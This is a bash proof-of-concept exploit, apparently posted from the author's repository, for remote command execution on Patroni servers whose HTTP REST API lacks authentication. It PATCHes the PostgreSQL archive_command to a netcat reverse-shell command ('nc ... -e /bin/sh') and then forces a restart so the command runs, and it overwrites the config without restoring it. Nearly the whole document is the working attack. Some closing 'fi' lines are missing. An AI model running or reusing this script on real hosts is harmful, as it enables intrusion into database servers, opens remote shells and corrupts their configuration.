Also available at my repo.
# Command to execute on vulnerable host
command="/usr/bin/nc 8080 -e /bin/sh"
if [ $# -eq 0 ]; then
echo "============================================="
echo "= Patroni HTTP API Remote Command Execution ="
echo "============================================="
echo ""
echo "[!] Use on your own risk! This script overwrites original postgresql config and doesn't restore it after work"
echo ""
echo "[?] Fix the \$command varialbe inside the script first"
echo "[?] Then, execute the PoC with $0 <ip>:<http_api_port>"
exit 0
echo "[+] Checking the $1..."
status_code=$(curl -sI -o /dev/null -XPATCH -w "%{http_code}" http://$1/config)
if [ "$status_code" -eq "401" ]; then
echo "[-] Patroni HTTP REST API on $1 is not vulnerable!"
exit 0
echo "[+] Patroni HTTP REST API on $1 looks vulnerable, sending PATCH request..."
patched_config=$(curl -s -XPATCH -d '{"postgresql":{"parameters":{"wal_level":"replica", "archive_mode":"always", "archive_command":"'"$command"'", "archive_timeout":"1"}}}' http://$1/config)
echo "[+] Initiating restart..."
curl -sI -o /dev/null -XPOST http://$1/restart
echo "[+] Done!"
The end